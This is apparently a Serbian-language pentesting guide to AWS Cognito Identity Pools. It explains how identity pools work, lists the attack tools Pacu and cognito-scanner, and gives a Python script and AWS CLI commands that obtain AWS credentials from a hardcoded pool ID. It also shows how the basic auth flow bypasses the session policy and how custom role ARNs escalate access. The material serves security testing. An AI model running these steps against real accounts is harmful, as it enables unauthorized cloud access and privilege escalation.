Cognito Identity Pools

Basic Information

Identitetski bazeni igraju ključnu ulogu omogućavajući vašim korisnicima da dobiju privremene akreditive. Ovi akreditivi su neophodni za pristup raznim AWS uslugama, uključujući, ali ne ograničavajući se na Amazon S3 i DynamoDB. Značajna karakteristika identitetskih bazena je njihova podrška za anonimne gostujuće korisnike i niz provajdera identiteta za autentifikaciju korisnika. Podržani provajderi identiteta uključuju:

• Amazon Cognito korisnički bazeni

• Opcije prijave putem društvenih mreža kao što su Facebook, Google, Prijava putem Amazona i Prijava putem Apple-a

• Provajderi usklađeni sa OpenID Connect (OIDC)

• SAML (Security Assertion Markup Language) provajderi identiteta

• Identiteti koje autentifikuju programeri

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Da biste generisali sesije Identity Pool-a, prvo morate generisati Identity ID. Ovaj Identity ID je identifikacija sesije tog korisnika. Ove identifikacije mogu imati do 20 skupova podataka koji mogu čuvati do 1MB parova ključ-vrednost.

Ovo je korisno za čuvanje informacija o korisniku (koji će uvek koristiti isti Identity ID).

Pored toga, usluga cognito-sync je usluga koja omogućava upravljanje i sinhronizaciju ovih informacija (u skupovima podataka, slanje informacija u tokovima i SNS porukama...).

Tools for pentesting

• Pacu, AWS okvir za eksploataciju, sada uključuje module "cognito__enum" i "cognito__attack" koji automatizuju enumeraciju svih Cognito resursa u nalogu i označavaju slabe konfiguracije, atribute korisnika korišćene za kontrolu pristupa itd., kao i automatizuju kreiranje korisnika (uključujući podršku za MFA) i eskalaciju privilegija na osnovu modifikabilnih prilagođenih atributa, upotrebljivih kredencijala identity pool-a, preuzimljivih uloga u id tokenima itd.

Za opis funkcija modula pogledajte deo 2 blog posta. Za uputstva za instalaciju pogledajte glavnu stranicu Pacu.

Usage

Primer korišćenja cognito__attack za pokušaj kreiranja korisnika i svih privesc vektora protiv datog identity pool-a i korisničkog pool klijenta:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Primer korišćenja cognito__enum za prikupljanje svih korisničkih bazena, klijenata korisničkih bazena, identitetskih bazena, korisnika itd. vidljivih u trenutnom AWS nalogu:

Pacu (new:test) > run cognito__enum

• Cognito Scanner je CLI alat u python-u koji implementira različite napade na Cognito, uključujući neželjeno kreiranje naloga i eskalaciju identitetskog bazena.

Instalacija

$ pip install cognito-scanner

Korišćenje

$ cognito-scanner --help

Za više informacija proverite https://github.com/padok-team/cognito-scanner

Pristup IAM rolama

Neautentifikovani

Jedina stvar koju napadač treba da zna da bi dobio AWS kredencijale u Cognito aplikaciji kao neautentifikovani korisnik je ID identitetskog bazena, i ovaj ID mora biti hardkodiran u web/mobilnoj aplikaciji da bi se koristio. ID izgleda ovako: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (nije moguće probiti ga brute force-om).

Ako pronađete ID identitetskog bazena hardkodiran i omogućava neautentifikovanim korisnicima, možete dobiti AWS kredencijale sa:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

Ili možete koristiti sledeće aws cli komande:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Poboljšan vs Osnovni tok autentifikacije

Prethodna sekcija je pratila podrazumevani poboljšani tok autentifikacije. Ovaj tok postavlja restriktivnu politiku sesije za IAM ulogu koja je generisana. Ova politika će omogućiti sesiji da koristi usluge sa ove liste (čak i ako je uloga imala pristup drugim uslugama).

Međutim, postoji način da se to zaobiđe, ako je Identitetski bazen omogućio "Osnovni (Klasični) Tok", korisnik će moći da dobije sesiju koristeći taj tok koji neće imati tu restriktivnu politiku sesije.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

Imajući set IAM kredencijala, trebali biste proveriti koje pristupe imate i pokušati da povećate privilegije.

Autentifikovani

Takođe mogu postojati uloge dostupne za autentifikovane korisnike koji pristupaju Identity Pool.

Za ovo možda ćete morati da imate pristup provajderu identiteta. Ako je to Cognito User Pool, možda možete da iskoristite podrazumevano ponašanje i napravite novog korisnika sami.

U svakom slučaju, sledeći primer očekuje da ste se već prijavili unutar Cognito User Pool koji se koristi za pristup Identity Pool-u (ne zaboravite da se drugi tipovi provajdera identiteta takođe mogu konfigurisati).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Dobijte identity_id iz prethodnog odgovora komande
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# U IdToken-u možete pronaći uloge kojima korisnik ima pristup zbog grupa User Pool-a
# Koristite --custom-role-arn da dobijete kredencijale za specifičnu ulogu
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>